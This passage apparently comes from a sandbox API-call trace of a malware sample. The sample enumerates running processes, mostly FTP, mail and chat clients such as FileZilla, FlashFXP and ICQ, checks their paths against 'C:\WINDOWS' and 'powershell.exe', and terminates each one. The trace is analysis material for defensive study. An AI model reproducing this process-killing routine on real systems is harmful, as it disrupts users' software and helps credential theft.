GetCurrentProcessId () returned 0xf00 [0059.988] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xc1c) returned 0x404 [0059.988] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0059.988] TerminateProcess (hProcess=0x404, uExitCode=0x11507ad) returned 1 [0060.043] CloseHandle (hObject=0x404) returned 1 [0060.043] CloseHandle (hObject=0x3fc) returned 1 [0060.043] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0060.044] GetCurrentProcessId () returned 0xf00 [0060.044] GetCurrentProcess () returned 0xffffffff [0060.044] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.044] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xa7c) returned 0x3fc [0060.044] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Uninstall Information\\far.exe" (normalized: "c:\\program files\\uninstall information\\far.exe")) returned 0x2e [0060.044] StrStrIW (lpFirst="C:\\Program Files\\Uninstall Information\\far.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0060.044] StrStrIW (lpFirst="C:\\Program Files\\Uninstall Information\\far.exe", lpSrch="powershell.exe") returned 0x0 [0060.044] StrStrIW (lpFirst="C:\\Program Files\\Uninstall Information\\far.exe", lpSrch="powershell.exe") returned 0x0 [0060.044] StrStrIW (lpFirst="C:\\Program Files\\Uninstall Information\\far.exe", lpSrch="powershell.exe") returned 0x0 [0060.044] StrStrIW (lpFirst="C:\\Program Files\\Uninstall Information\\far.exe", lpSrch="powershell.exe") returned 0x0 [0060.044] StrStrIW (lpFirst="C:\\Program Files\\Uninstall Information\\far.exe", lpSrch="powershell.exe") returned 0x0 [0060.044] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0060.044] GetTickCount () returned 0x11507dc [0060.044] GetCurrentProcessId () returned 0xf00 [0060.044] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xa7c) returned 0x404 [0060.044] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0060.044] TerminateProcess (hProcess=0x404, uExitCode=0x11507dc) returned 1 [0060.045] CloseHandle (hObject=0x404) returned 1 [0060.045] CloseHandle (hObject=0x3fc) returned 1 [0060.046] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0060.046] GetCurrentProcessId () returned 0xf00 [0060.046] GetCurrentProcess () returned 0xffffffff [0060.047] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.047] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xe00) returned 0x3fc [0060.047] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Windows Sidebar\\filezilla.exe" (normalized: "c:\\program files (x86)\\windows sidebar\\filezilla.exe")) returned 0x34 [0060.047] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Sidebar\\filezilla.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0060.047] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Sidebar\\filezilla.exe", lpSrch="powershell.exe") returned 0x0 [0060.047] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Sidebar\\filezilla.exe", lpSrch="powershell.exe") returned 0x0 [0060.047] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Sidebar\\filezilla.exe", lpSrch="powershell.exe") returned 0x0 [0060.047] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Sidebar\\filezilla.exe", lpSrch="powershell.exe") returned 0x0 [0060.047] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Sidebar\\filezilla.exe", lpSrch="powershell.exe") returned 0x0 [0060.047] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0060.047] GetTickCount () returned 0x11507ec [0060.047] GetCurrentProcessId () returned 0xf00 [0060.047] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xe00) returned 0x404 [0060.047] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0060.047] TerminateProcess (hProcess=0x404, uExitCode=0x11507ec) returned 1 [0060.048] CloseHandle (hObject=0x404) returned 1 [0060.048] CloseHandle (hObject=0x3fc) returned 1 [0060.048] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0060.049] GetCurrentProcessId () returned 0xf00 [0060.049] GetCurrentProcess () returned 0xffffffff [0060.049] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.049] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x58c) returned 0x3fc [0060.049] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Mozilla Firefox\\flashfxp.exe" (normalized: "c:\\program files\\mozilla firefox\\flashfxp.exe")) returned 0x2d [0060.050] StrStrIW (lpFirst="C:\\Program Files\\Mozilla Firefox\\flashfxp.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0060.050] StrStrIW (lpFirst="C:\\Program Files\\Mozilla Firefox\\flashfxp.exe", lpSrch="powershell.exe") returned 0x0 [0060.050] StrStrIW (lpFirst="C:\\Program Files\\Mozilla Firefox\\flashfxp.exe", lpSrch="powershell.exe") returned 0x0 [0060.050] StrStrIW (lpFirst="C:\\Program Files\\Mozilla Firefox\\flashfxp.exe", lpSrch="powershell.exe") returned 0x0 [0060.050] StrStrIW (lpFirst="C:\\Program Files\\Mozilla Firefox\\flashfxp.exe", lpSrch="powershell.exe") returned 0x0 [0060.050] StrStrIW (lpFirst="C:\\Program Files\\Mozilla Firefox\\flashfxp.exe", lpSrch="powershell.exe") returned 0x0 [0060.050] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0060.050] GetTickCount () returned 0x11507ec [0060.050] GetCurrentProcessId () returned 0xf00 [0060.050] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0x58c) returned 0x404 [0060.050] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0060.050] TerminateProcess (hProcess=0x404, uExitCode=0x11507ec) returned 1 [0060.051] CloseHandle (hObject=0x404) returned 1 [0060.051] CloseHandle (hObject=0x3fc) returned 1 [0060.051] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0060.052] GetCurrentProcessId () returned 0xf00 [0060.052] GetCurrentProcess () returned 0xffffffff [0060.052] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.052] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xa84) returned 0x3fc [0060.052] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Common Files\\fling.exe" (normalized: "c:\\program files\\common files\\fling.exe")) returned 0x27 [0060.052] StrStrIW (lpFirst="C:\\Program Files\\Common Files\\fling.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0060.052] StrStrIW (lpFirst="C:\\Program Files\\Common Files\\fling.exe", lpSrch="powershell.exe") returned 0x0 [0060.052] StrStrIW (lpFirst="C:\\Program Files\\Common Files\\fling.exe", lpSrch="powershell.exe") returned 0x0 [0060.052] StrStrIW (lpFirst="C:\\Program Files\\Common Files\\fling.exe", lpSrch="powershell.exe") returned 0x0 [0060.052] StrStrIW (lpFirst="C:\\Program Files\\Common Files\\fling.exe", lpSrch="powershell.exe") returned 0x0 [0060.052] StrStrIW (lpFirst="C:\\Program Files\\Common Files\\fling.exe", lpSrch="powershell.exe") returned 0x0 [0060.052] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0060.053] GetTickCount () returned 0x11507ec [0060.053] GetCurrentProcessId () returned 0xf00 [0060.053] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xa84) returned 0x404 [0060.053] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0060.053] TerminateProcess (hProcess=0x404, uExitCode=0x11507ec) returned 1 [0060.056] CloseHandle (hObject=0x404) returned 1 [0060.056] CloseHandle (hObject=0x3fc) returned 1 [0060.056] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0060.057] GetCurrentProcessId () returned 0xf00 [0060.057] GetCurrentProcess () returned 0xffffffff [0060.057] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.057] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xa08) returned 0x3fc [0060.057] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\WindowsPowerShell\\foxmailincmail.exe" (normalized: "c:\\program files\\windowspowershell\\foxmailincmail.exe")) returned 0x35 [0060.058] StrStrIW (lpFirst="C:\\Program Files\\WindowsPowerShell\\foxmailincmail.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0060.058] StrStrIW (lpFirst="C:\\Program Files\\WindowsPowerShell\\foxmailincmail.exe", lpSrch="powershell.exe") returned 0x0 [0060.058] StrStrIW (lpFirst="C:\\Program Files\\WindowsPowerShell\\foxmailincmail.exe", lpSrch="powershell.exe") returned 0x0 [0060.058] StrStrIW (lpFirst="C:\\Program Files\\WindowsPowerShell\\foxmailincmail.exe", lpSrch="powershell.exe") returned 0x0 [0060.058] StrStrIW (lpFirst="C:\\Program Files\\WindowsPowerShell\\foxmailincmail.exe", lpSrch="powershell.exe") returned 0x0 [0060.058] StrStrIW (lpFirst="C:\\Program Files\\WindowsPowerShell\\foxmailincmail.exe", lpSrch="powershell.exe") returned 0x0 [0060.058] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0060.058] GetTickCount () returned 0x11507ec [0060.058] GetCurrentProcessId () returned 0xf00 [0060.058] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xa08) returned 0x404 [0060.058] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0060.058] TerminateProcess (hProcess=0x404, uExitCode=0x11507ec) returned 1 [0060.059] CloseHandle (hObject=0x404) returned 1 [0060.059] CloseHandle (hObject=0x3fc) returned 1 [0060.060] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0060.061] GetCurrentProcessId () returned 0xf00 [0060.061] GetCurrentProcess () returned 0xffffffff [0060.061] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.061] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xdb4) returned 0x3fc [0060.061] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Microsoft Office 15\\gmailnotifierpro.exe" (normalized: "c:\\program files\\microsoft office 15\\gmailnotifierpro.exe")) returned 0x39 [0060.061] StrStrIW (lpFirst="C:\\Program Files\\Microsoft Office 15\\gmailnotifierpro.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0060.061] StrStrIW (lpFirst="C:\\Program Files\\Microsoft Office 15\\gmailnotifierpro.exe", lpSrch="powershell.exe") returned 0x0 [0060.061] StrStrIW (lpFirst="C:\\Program Files\\Microsoft Office 15\\gmailnotifierpro.exe", lpSrch="powershell.exe") returned 0x0 [0060.061] StrStrIW (lpFirst="C:\\Program Files\\Microsoft Office 15\\gmailnotifierpro.exe", lpSrch="powershell.exe") returned 0x0 [0060.061] StrStrIW (lpFirst="C:\\Program Files\\Microsoft Office 15\\gmailnotifierpro.exe", lpSrch="powershell.exe") returned 0x0 [0060.061] StrStrIW (lpFirst="C:\\Program Files\\Microsoft Office 15\\gmailnotifierpro.exe", lpSrch="powershell.exe") returned 0x0 [0060.061] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0060.061] GetTickCount () returned 0x11507ec [0060.061] GetCurrentProcessId () returned 0xf00 [0060.062] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xdb4) returned 0x404 [0060.062] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0060.062] TerminateProcess (hProcess=0x404, uExitCode=0x11507ec) returned 1 [0060.063] CloseHandle (hObject=0x404) returned 1 [0060.063] CloseHandle (hObject=0x3fc) returned 1 [0060.063] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0060.064] GetCurrentProcessId () returned 0xf00 [0060.064] GetCurrentProcess () returned 0xffffffff [0060.064] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.064] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1fc) returned 0x3fc [0060.064] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Reference Assemblies\\icq.exe" (normalized: "c:\\program files (x86)\\reference assemblies\\icq.exe")) returned 0x33 [0060.065] StrStrIW (lpFirst="C:\\Program Files (x86)\\Reference Assemblies\\icq.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0060.065] StrStrIW (lpFirst="C:\\Program Files (x86)\\Reference Assemblies\\icq.exe", lpSrch="powershell.exe") returned 0x0 [0060.065] StrStrIW (lpFirst="C:\\Program Files (x86)\\Reference Assemblies\\icq.exe", lpSrch="powershell.exe") returned 0x0 [0060.065] StrStrIW (lpFirst="C:\\Program Files (x86)\\Reference Assemblies\\icq.exe", lpSrch="powershell.exe") returned 0x0 [0060.065] StrStrIW (lpFirst="C:\\Program Files (x86)\\Reference Assemblies\\icq.exe", lpSrch="powershell.exe") returned 0x0 [0060.065] StrStrIW (lpFirst="C:\\Program Files (x86)\\Reference Assemblies\\icq.exe", lpSrch="powershell.exe") returned 0x0 [0060.065] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0060.065] GetTickCount () returned 0x11507fb [0060.065] GetCurrentProcessId () returned 0xf00 [0060.065] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0x1fc) returned 0x404 [0060.065] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0060.065] TerminateProcess (hProcess=0x404, uExitCode=0x11507fb) returned 1 [0060.066] CloseHandle (hObject=0x404) returned 1 [0060.066] CloseHandle (hObject=0x3fc) returned 1 [0060.066] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0060.068] GetCurrentProcessId () returned 0xf00 [0060.068] GetCurrentProcess () returned 0xffffffff [0060.068] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.068] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x2d4) returned 0x3fc [0060.068] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Windows Photo Viewer\\leechftp.exe" (normalized: "c:\\program files (x86)\\windows photo viewer\\leechftp.exe")) returned 0x38 [0060.068] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Photo Viewer\\leechftp.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0060.068] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Photo Viewer\\leechftp.exe", lpSrch="powershell.exe") returned 0x0 [0060.068] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Photo Viewer\\leechftp.exe", lpSrch="powershell.exe") returned 0x0 [0060.068] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Photo Viewer\\leechftp.exe", lpSrch="powershell.exe") returned 0x0 [0060.068] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Photo Viewer\\leechftp.exe", lpSrch="powershell.exe") returned 0x0 [0060.068] StrStrIW (lpFirst="C:\\Program Files (x86)\\Windows Photo Viewer\\leechftp.exe", lpSrch="powershell.exe") returned 0x0 [0060.068] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0060.068] GetTickCount () returned 0x11507fb [0060.069] GetCurrentProcessId () returned 0xf00 [0060.069] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0x2d4) returned 0x404 [0060.069] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0060.069] TerminateProcess (hProcess=0x404, uExitCode=0x11507fb) returned 1 [0060.070] CloseHandle (hObject=0x404) returned 1 [0060.070] CloseHandle (hObject=0x3fc) returned 1 [0060.070] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0060.071] GetCurrentProcessId () returned 0xf00 [0060.071] GetCurrentProcess () returned 0xffffffff [0060.071] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.071] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x3b8) returned 0x3fc [0060.071] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Windows Portable Devices\\ncftp.exe" (normalized: "c:\\program files\\windows portable devices\\ncftp.exe")) returned 0x33 [0060.072] StrStrIW (lpFirst="C:\\Program Files\\Windows Portable Devices\\ncftp.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0060.072] StrStrIW (lpFirst="C:\\Program Files\\Windows Portable Devices\\ncftp.exe", lpSrch="powershell.exe") returned 0x0 [0060.072] StrStrIW (lpFirst="C:\\Program Files\\Windows Portable Devices\\ncftp.exe", lpSrch="powershell.exe") returned 0x0 [0060.072] StrStrIW (lpFirst="C:\\Program Files\\Windows Portable Devices\\ncftp.exe", lpSrch="powershell.exe") returned 0x0 [0060.072] StrStrIW (lpFirst="C:\\Program Files\\Windows Portable Devices\\ncftp.exe", lpSrch="powershell.exe") returned 0x0 [0060.072] StrStrIW (lpFirst="C:\\Program Files\\Windows Portable Devices\\ncftp.exe", lpSrch="powershell.exe") returned 0x0 [0060.072] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0060.072] GetTickCount () returned 0x11507fb [0060.072] GetCurrentProcessId () returned 0xf00 [0060.072] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0x3b8) returned 0x404 [0060.072] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0060.072] TerminateProcess (hProcess=0x404, uExitCode=0x11507fb) returned 1 [0060.073] CloseHandle (hObject=0x404) returned 1 [0060.073] CloseHandle (hObject=0x3fc) returned 1 [0060.074] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0060.075] GetCurrentProcessId () returned 0xf00 [0060.075] GetCurrentProcess () returned 0xffffffff [0060.075] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0060.075] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xdec) returned 0x3fc [0060.075] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Mozilla Firefox\\notepad.exe" (normalized: "c:\\program files\\mozilla firefox\\notepad.exe")) returned 0x2c [0060.075] StrStrIW (lpFirst="C:\\Program Files\\Mozilla Firefox\\notepad.exe", lpSrch="C:\\WINDOWS") returned 0x0 [0060.075] StrStrIW (lpFirst="C:\\Program Files\\Mozilla Firefox\\notepad.exe", lpSrch="powershell.exe") returned 0x0 [0060.075] StrStrIW (lpFirst="C:\\Program Files\\Mozilla Firefox\\notepad.exe", lpSrch="powershell.exe") returned 0x0 [0060.075] StrStrIW (lpFirst="C:\\Program Files\\Mozilla Firefox\\notepad.exe", lpSrch="powershell.exe") returned 0x0 [0060.075] StrStrIW (lpFirst="C:\\Program Files\\Mozilla Firefox\\notepad.exe", lpSrch="powershell.exe") returned 0x0 [0060.075] StrStrIW (lpFirst="C:\\Program Files\\Mozilla Firefox\\notepad.exe", lpSrch="powershell.exe") returned 0x0 [0060.076] NtQueryInformationProcess (in: ProcessHandle=0x3fc, ProcessInformationClass=0x1d, ProcessInformation=0x2eefc00, ProcessInformationLength=0x4, ReturnLength=0x2eefbfc | out: ProcessInformation=0x2eefc00, ReturnLength=0x2eefbfc) returned 0x0 [0060.076] GetTickCount () returned 0x11507fb [0060.076] GetCurrentProcessId () returned 0xf00 [0060.076] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xdec) returned 0x404 [0060.076] NtQueryInformationProcess (in: ProcessHandle=0x404, ProcessInformationClass=0x1d, ProcessInformation=0x2eef9d4, ProcessInformationLength=0x4, ReturnLength=0x2eef9d0 | out: ProcessInformation=0x2eef9d4, ReturnLength=0x2eef9d0) returned 0xc0000022 [0060.076] TerminateProcess (hProcess=0x404, uExitCode=0x11507fb) returned 1 [0060.077] CloseHandle (hObject=0x404) returned 1 [0060.077] CloseHandle (hObject=0x3fc) returned 1 [0060.077] Process32NextW (in: hSnapshot=0x3f8, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, 